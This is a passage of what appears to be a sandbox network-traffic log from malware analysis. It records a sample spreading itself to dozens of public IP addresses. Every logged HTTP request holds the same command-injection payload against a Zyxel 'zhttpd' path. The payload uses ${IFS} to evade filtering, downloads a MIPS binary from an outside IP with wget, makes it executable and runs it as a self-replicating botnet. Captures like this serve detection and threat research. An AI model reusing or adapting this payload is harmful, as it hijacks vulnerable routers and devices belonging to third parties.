                                        Jan 14, 2024 16:18:51.616723061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6209192.168.2.1357916202.206.217.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616769075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6210192.168.2.133780257.72.79.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616806030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6211192.168.2.134418424.86.99.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616839886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6212192.168.2.13510581.27.177.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616868019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6213192.168.2.1334334112.192.219.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616909981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6214192.168.2.1336844192.103.85.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616950035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6215192.168.2.1352128104.152.230.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.616975069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6216192.168.2.134013689.103.138.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617026091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6217192.168.2.134490280.59.162.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617047071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6218192.168.2.135405653.241.181.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617084026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6219192.168.2.1346404223.111.64.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617146969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6220192.168.2.1338132167.171.208.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617182016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6221192.168.2.133942067.169.227.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617211103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6222192.168.2.1353082190.155.26.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617254972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6223192.168.2.1343114102.57.46.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617285967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6224192.168.2.1333398110.132.189.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617330074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6225192.168.2.133956014.142.132.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617367029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6226192.168.2.1352526169.93.104.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617422104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6227192.168.2.1353388167.238.80.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617460012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6228192.168.2.1343210202.83.156.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617486000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6229192.168.2.1336660106.50.185.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617535114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6230192.168.2.13411661.168.10.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617573977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6231192.168.2.135258239.92.93.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617610931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6232192.168.2.134146425.209.47.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617649078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6233192.168.2.1341070218.138.124.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617696047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6234192.168.2.1355596146.40.2.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617746115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6235192.168.2.1341082113.85.205.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617775917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6236192.168.2.1357426159.250.143.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617808104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6237192.168.2.1345726147.28.79.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617856026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6238192.168.2.133475643.188.34.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617906094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6239192.168.2.134793671.48.95.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617939949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6240192.168.2.1336440178.141.0.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.617978096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6241192.168.2.1358596109.231.208.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618024111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6242192.168.2.1354640166.82.33.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618063927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6243192.168.2.1356108220.56.218.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618117094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6244192.168.2.133845466.97.54.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618154049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6245192.168.2.1354348138.40.53.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618190050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6246192.168.2.1334472111.119.132.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618235111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6247192.168.2.133745458.241.234.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618267059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6248192.168.2.1351680157.51.241.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618314981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6249192.168.2.1333776182.62.238.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618350029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6250192.168.2.1360500217.17.39.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618400097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6251192.168.2.1335900205.123.242.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618421078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6252192.168.2.1341936212.171.167.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618479967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6253192.168.2.1351918152.38.115.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618510008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6254192.168.2.135305420.14.213.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618537903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6255192.168.2.133888453.78.238.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618575096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6256192.168.2.133493436.130.252.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618623018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6257192.168.2.1353746136.41.34.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618662119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6258192.168.2.1359140164.60.40.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618721962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6259192.168.2.1349866193.24.237.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618745089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6260192.168.2.134131039.68.62.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618777037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6261192.168.2.1343530132.1.39.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618829966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6262192.168.2.134818634.219.94.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618865967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6263192.168.2.1346868139.95.40.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618918896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6264192.168.2.1345004176.220.114.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.618963003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6265192.168.2.1348552109.24.42.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.622972965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6266192.168.2.1350546162.239.193.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623001099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6267192.168.2.1342342147.98.200.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623049021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6268192.168.2.1337298126.170.168.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623102903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6269192.168.2.1339066165.113.191.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623131990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6270192.168.2.134524499.228.194.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623158932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6271192.168.2.1351082205.47.0.107443
                                        TimestampBytes transferredDirectionData
